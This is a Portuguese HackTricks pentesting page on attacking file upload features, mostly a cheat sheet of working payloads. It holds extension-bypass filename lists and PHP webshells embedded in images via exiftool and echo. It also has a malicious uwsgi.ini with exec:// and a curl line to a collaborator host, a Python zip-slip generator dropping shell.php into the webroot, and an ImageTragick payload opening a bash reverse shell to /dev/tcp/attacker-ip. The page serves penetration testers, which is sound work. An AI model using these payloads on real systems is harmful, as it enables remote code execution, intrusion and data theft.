27 KiB
Upload de Arquivo
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, verifique os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os repositórios HackTricks e HackTricks Cloud.
Se você está interessado em carreira de hacking e hackear o inquebrável - estamos contratando! (fluência em polonês escrito e falado é necessária).
{% embed url="https://www.stmcyber.com/careers" %}
Metodologia Geral de Upload de Arquivo
Outras extensões úteis:
- PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
- Trabalhando em PHPv8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp
- ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
- Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
- Coldfusion: .cfm, .cfml, .cfc, .dbm
- Flash: .swf
- Perl: .pl, .cgi
- Servidor Web Erlang Yaws: .yaws
Bypass de Verificações de Extensões de Arquivo
- Se aplicável, verifique as extensões anteriores. Teste-as também usando algumas letras maiúsculas: pHp, .pHP5, .PhAr ...
- Verifique adicionando uma extensão válida antes da extensão de execução (use também as extensões anteriores):
- file.png.php
- file.png.Php5
- Tente adicionar caracteres especiais no final. Você pode usar o Burp para forçar todos os caracteres ascii e Unicode. (Observe que você também pode tentar usar as extensões anteriormente mencionadas)
- file.php%20
- file.php%0a
- file.php%00
- file.php%0d%0a
- file.php/
- file.php.\
- file.
- file.php....
- file.pHp5....
- Tente contornar as proteções enganando o analisador de extensões do lado do servidor com técnicas como duplicar a extensão ou adicionar dados lixo (bytes nulos) entre as extensões. Você também pode usar as extensões anteriores para preparar um payload melhor.
- file.png.php
- file.png.pHp5
- file.php#.png
- file.php%00.png
- file.php\x00.png
- file.php%0a.png
- file.php%0d%0a.png
- file.phpJunk123png
- Adicione outra camada de extensões à verificação anterior:
- file.png.jpg.php
- file.php%00.png%00.jpg
- Tente colocar a extensão de execução antes da extensão válida e reze para que o servidor esteja mal configurado. (útil para explorar configurações incorretas do Apache onde qualquer coisa com a extensão** .php, mas não necessariamente terminando em .php** executará código):
- ex: file.php.png
- Usando fluxo de dados alternativo NTFS (ADS) no Windows. Neste caso, um caractere de dois pontos ":" será inserido após uma extensão proibida e antes de uma permitida. Como resultado, um arquivo vazio com a extensão proibida será criado no servidor (por exemplo, "file.asax:.jpg"). Este arquivo pode ser editado posteriormente usando outras técnicas, como usar seu nome curto. O padrão “::$data” também pode ser usado para criar arquivos não vazios. Portanto, adicionar um caractere de ponto após esse padrão também pode ser útil para contornar restrições adicionais (por exemplo, “file.asp::$data.”)
- Tente quebrar os limites do nome do arquivo. A extensão válida é cortada. E o PHP malicioso é deixado. AAA<--SNIP-->AAA.php
# Linux máximo de 255 bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # menos 4 aqui e adicionando .png
# Faça o upload do arquivo e verifique a resposta quantos caracteres ele permite. Digamos 236
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Faça o payload
AAA<--SNIP 232 A-->AAA.php.png
Bypassar Content-Type, Número Mágico, Compressão e Redimensionamento
- Bypassar verificações de Content-Type definindo o valor do header Content-Type para: image/png, text/plain, application/octet-stream
- Wordlist de Content-Type: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt
- Bypassar verificação de número mágico adicionando no início do arquivo os bytes de uma imagem real (confundir o comando file). Ou introduzir o shell dentro dos metadados:
exiftool -Comment="<?php echo 'Comando:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
\
ou também introduzir o payload diretamente em uma imagem:
echo '<?php system($_REQUEST['cmd']); ?>' >> img.png
- Se compressão estiver sendo adicionada à sua imagem, por exemplo, usando algumas bibliotecas PHP padrão como PHP-GD, as técnicas anteriores não serão úteis. No entanto, você pode usar o chunk PLTE técnica definida aqui para inserir algum texto que sobreviverá à compressão.
- Github com o código
- A página da web também pode estar redimensionando a imagem, usando por exemplo as funções PHP-GD
imagecopyresized
ouimagecopyresampled
. No entanto, você pode usar o chunk IDAT técnica definida aqui para inserir algum texto que sobreviverá à compressão. - Github com o código
- Outra técnica para criar um payload que sobrevive a um redimensionamento de imagem, usando a função PHP-GD
thumbnailImage
. No entanto, você pode usar o chunk tEXt técnica definida aqui para inserir algum texto que sobreviverá à compressão. - Github com o código
Outros Truques para Verificar
- Encontrar uma vulnerabilidade para renomear o arquivo já enviado (para alterar a extensão).
- Encontrar uma vulnerabilidade de Inclusão de Arquivo Local para executar a backdoor.
- Possível divulgação de informações:
- Enviar várias vezes (e ao mesmo tempo) o mesmo arquivo com o mesmo nome
- Enviar um arquivo com o nome de um arquivo ou pasta que já existe
- Enviar um arquivo com “.”, “..” ou “…” como seu nome. Por exemplo, no Apache no Windows, se a aplicação salvar os arquivos enviados no diretório “/www/uploads/”, o nome de arquivo “.” criará um arquivo chamado “uploads” no diretório “/www/”.
- Enviar um arquivo que não pode ser facilmente excluído, como “…:.jpg” no NTFS (Windows).
- Enviar um arquivo no Windows com caracteres inválidos como
|<>*?”
em seu nome (Windows). - Enviar um arquivo no Windows usando nomes reservados (proibidos) como CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8 e LPT9.
- Tente também enviar um executável (.exe) ou um .html (menos suspeito) que executará código quando aberto acidentalmente pela vítima.
Truques de Extensão Especial
Se você está tentando enviar arquivos para um servidor PHP, dê uma olhada no truque do .htaccess para executar código.
Se você está tentando enviar arquivos para um servidor ASP, dê uma olhada no truque do .config para executar código.
Os arquivos .phar
são como os arquivos .jar
para Java, mas para PHP, e podem ser usados como um arquivo PHP (executando-o com PHP ou incluindo-o dentro de um script...).
A extensão .inc
é às vezes usada para arquivos PHP que são apenas usados para importar arquivos, então, em algum momento, alguém poderia ter permitido essa extensão ser executada.
Jetty RCE
Se você puder enviar um arquivo XML para um servidor Jetty, você pode obter RCE porque novos *.xml e *.war são processados automaticamente. Portanto, como mencionado na imagem a seguir, envie o arquivo XML para $JETTY_BASE/webapps/
e espere a shell!
uWSGI RCE
Para uma exploração detalhada dessa vulnerabilidade, confira a pesquisa original: Exploração de RCE do uWSGI.
Vulnerabilidades de Execução Remota de Comandos (RCE) podem ser exploradas em servidores uWSGI se alguém tiver a capacidade de modificar o arquivo de configuração .ini
. Os arquivos de configuração do uWSGI utilizam uma sintaxe específica para incorporar variáveis "mágicas", espaços reservados e operadores. Notavelmente, o operador '@', utilizado como @(nome do arquivo)
, é projetado para incluir o conteúdo de um arquivo. Entre os vários esquemas suportados no uWSGI, o esquema "exec" é particularmente potente, permitindo a leitura de dados a partir da saída padrão de um processo. Essa funcionalidade pode ser manipulada para fins maliciosos, como Execução Remota de Comandos ou Escrita/Leitura Arbitrária de Arquivos quando um arquivo de configuração .ini
é processado.
Considere o seguinte exemplo de um arquivo uwsgi.ini
prejudicial, mostrando vários esquemas:
[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
A execução da carga ocorre durante a análise do arquivo de configuração. Para que a configuração seja ativada e analisada, o processo uWSGI deve ser reiniciado (potencialmente após uma falha ou devido a um ataque de Negação de Serviço) ou o arquivo deve ser configurado para recarregar automaticamente. O recurso de recarga automática, se ativado, recarrega o arquivo em intervalos especificados ao detectar alterações.
É crucial entender a natureza flexível da análise de arquivos de configuração do uWSGI. Especificamente, a carga discutida pode ser inserida em um arquivo binário (como uma imagem ou PDF), ampliando ainda mais o escopo de exploração potencial.
Truque de Upload de Arquivo/SSRF do wget
Em algumas ocasiões, você pode descobrir que um servidor está usando o wget
para baixar arquivos e você pode indicar a URL. Nestes casos, o código pode estar verificando se a extensão dos arquivos baixados está dentro de uma lista branca para garantir que apenas arquivos permitidos sejam baixados. No entanto, essa verificação pode ser contornada.
O comprimento máximo de um nome de arquivo no Linux é 255, no entanto, o wget trunca os nomes de arquivo para 236 caracteres. Você pode baixar um arquivo chamado "A"*232+".php"+".gif", este nome de arquivo irá burlar a verificação (como neste exemplo ".gif" é uma extensão válida), mas o wget
irá renomear o arquivo para "A"*232+".php".
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080
#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06-- http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>] 10 --.-KB/s in 0s
2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]
Note que outra opção que você pode estar pensando para contornar essa verificação é fazer com que o servidor HTTP redirecione para um arquivo diferente, então a URL inicial irá contornar a verificação e então o wget irá baixar o arquivo redirecionado com o novo nome. Isso não funcionará a menos que o wget esteja sendo usado com o parâmetro --trust-server-names
porque o wget irá baixar a página redirecionada com o nome do arquivo indicado na URL original.
Ferramentas
- Upload Bypass é uma ferramenta poderosa projetada para ajudar Pentesters e Bug Hunters a testar mecanismos de upload de arquivos. Ele aproveita várias técnicas de recompensa por bugs para simplificar o processo de identificação e exploração de vulnerabilidades, garantindo avaliações completas de aplicativos da web.
De Upload de Arquivo para outras vulnerabilidades
- Defina o nome do arquivo como
../../../tmp/lol.png
e tente alcançar uma travessia de caminho - Defina o nome do arquivo como
sleep(10)-- -.jpg
e você pode ser capaz de alcançar uma injeção de SQL - Defina o nome do arquivo como
<svg onload=alert(document.domain)>
para alcançar um XSS - Defina o nome do arquivo como
; sleep 10;
para testar alguma injeção de comando (mais trapaças de injeção de comando aqui) - XSS em upload de arquivo de imagem (svg)
- Upload de arquivo JS + XSS = exploração de Service Workers
- XXE em upload de svg
- Redirecionamento Aberto via upload de arquivo svg
- Experimente diferentes payloads svg de https://github.com/allanlw/svg-cheatsheet****
- Vulnerabilidade de ImageTrick famosa
- Se você puder indicar ao servidor web para capturar uma imagem de uma URL você poderia tentar abusar de um SSRF. Se esta imagem for salva em algum site público, você também poderia indicar uma URL de https://iplogger.org/invisible/ e roubar informações de cada visitante.
- XXE e CORS bypass com upload de PDF-Adobe
- PDFs especialmente elaborados para XSS: A página a seguir apresenta como injetar dados de PDF para obter execução de JS. Se você puder fazer upload de PDFs, você poderia preparar alguns PDFs que executarão JS arbitrário seguindo as indicações fornecidas.
- Faça o upload do conteúdo [eicar](https://secure.eicar.org/eicar.com.txt) para verificar se o servidor possui algum antivírus
- Verifique se há algum limite de tamanho para upload de arquivos
Aqui está uma lista dos 10 principais itens que você pode alcançar fazendo upload (de aqui):
- ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
- SVG: XSS armazenado / SSRF / XXE
- GIF: XSS armazenado / SSRF
- CSV: injeção de CSV
- XML: XXE
- AVI: LFI / SSRF
- HTML / JS : injeção de HTML / XSS / Redirecionamento aberto
- PNG / JPEG: Ataque de inundação de pixels (DoS)
- ZIP: RCE via LFI / DoS
- PDF / PPTX: SSRF / BLIND XXE
Extensão Burp
{% embed url="https://github.com/portswigger/upload-scanner" %}
Bytes de Cabeçalho Mágico
- PNG:
"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["
- JPG:
"\xff\xd8\xff"
Consulte https://en.wikipedia.org/wiki/List_of_file_signatures para outros tipos de arquivos.
Upload Automático de Arquivo Zip/Tar Descompactado
Se você puder fazer upload de um ZIP que será descompactado dentro do servidor, você pode fazer 2 coisas:
Symlink
Faça upload de um link contendo links simbólicos para outros arquivos e, em seguida, acessando os arquivos descompactados, você acessará os arquivos vinculados:
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
Descompactar em pastas diferentes
A criação inesperada de arquivos em diretórios durante a descompressão é um problema significativo. Apesar das suposições iniciais de que essa configuração poderia proteger contra a execução de comandos em nível de sistema operacional por meio de uploads de arquivos maliciosos, o suporte à compressão hierárquica e as capacidades de travessia de diretórios do formato de arquivo ZIP podem ser explorados. Isso permite que os atacantes ignorem restrições e escapem de diretórios de upload seguros manipulando a funcionalidade de descompressão do aplicativo alvo.
Um exploit automatizado para criar esses arquivos está disponível em evilarc no GitHub. A utilidade pode ser usada da seguinte maneira:
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
Além disso, o truque de symlink com evilarc é uma opção. Se o objetivo é direcionar um arquivo como /flag.txt
, um symlink para esse arquivo deve ser criado em seu sistema. Isso garante que o evilarc não encontre erros durante sua operação.
Abaixo está um exemplo de código Python usado para criar um arquivo zip malicioso:
#!/usr/bin/python
import zipfile
from io import BytesIO
def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()
create_zip()
Abuso de compressão para pulverização de arquivos
Para mais detalhes, verifique a postagem original em: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/
- Criando um Shell PHP: O código PHP é escrito para executar comandos passados pela variável
$_REQUEST
.
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>
- Pulverização de Arquivos e Criação de Arquivo Comprimido: Múltiplos arquivos são criados e um arquivo zip é montado contendo esses arquivos.
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
- Modificação com um Editor Hexadecimal ou vi: Os nomes dos arquivos dentro do zip são alterados usando vi ou um editor hexadecimal, mudando "xxA" para "../" para percorrer diretórios.
:set modifiable
:%s/xxA/..\//g
:x!
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
Incorporando Shell PHP em PNG
Incorporar um shell PHP no chunk IDAT de um arquivo PNG pode contornar efetivamente certas operações de processamento de imagem. As funções imagecopyresized
e imagecopyresampled
do PHP-GD são particularmente relevantes nesse contexto, pois são comumente usadas para redimensionar e reamostrar imagens, respectivamente. A capacidade do shell PHP incorporado de permanecer inalterado por essas operações é uma vantagem significativa para determinados casos de uso.
Uma exploração detalhada dessa técnica, incluindo sua metodologia e aplicações potenciais, é fornecida no seguinte artigo: "Codificando Web Shells em chunks IDAT de PNG". Este recurso oferece uma compreensão abrangente do processo e suas implicações.
Mais informações em: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
Arquivos Poliglotas
Arquivos poliglotas atuam como uma ferramenta única em cibersegurança, agindo como camaleões que podem existir validamente em múltiplos formatos de arquivo simultaneamente. Um exemplo intrigante é um GIFAR, um híbrido que funciona tanto como um GIF quanto como um arquivo RAR. Tais arquivos não se limitam a essa combinação; combinações como GIF e JS ou PPT e JS também são viáveis.
A utilidade principal dos arquivos poliglotas reside em sua capacidade de contornar medidas de segurança que filtram arquivos com base no tipo. A prática comum em várias aplicações envolve permitir apenas certos tipos de arquivo para upload, como JPEG, GIF ou DOC, para mitigar o risco representado por formatos potencialmente prejudiciais (por exemplo, arquivos JS, PHP ou Phar). No entanto, um poliglota, ao se conformar aos critérios estruturais de múltiplos tipos de arquivo, pode contornar essas restrições de forma furtiva.
Apesar de sua adaptabilidade, os poliglotas encontram limitações. Por exemplo, enquanto um poliglota pode simultaneamente incorporar um arquivo PHAR (PHp ARchive) e um JPEG, o sucesso de seu upload pode depender das políticas de extensão de arquivo da plataforma. Se o sistema for rigoroso em relação às extensões permitidas, a mera dualidade estrutural de um poliglota pode não ser suficiente para garantir seu upload.
Mais informações em: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
Referências
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files
- https://github.com/modzero/mod0BurpUploadScanner
- https://github.com/almandin/fuxploider
- https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html
- https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
- https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
Se você está interessado em uma carreira em hacking e hackear o inquebrável - estamos contratando! (fluência em polonês escrita e falada é necessária).
{% embed url="https://www.stmcyber.com/careers" %}
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, verifique os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os repositórios HackTricks e HackTricks Cloud.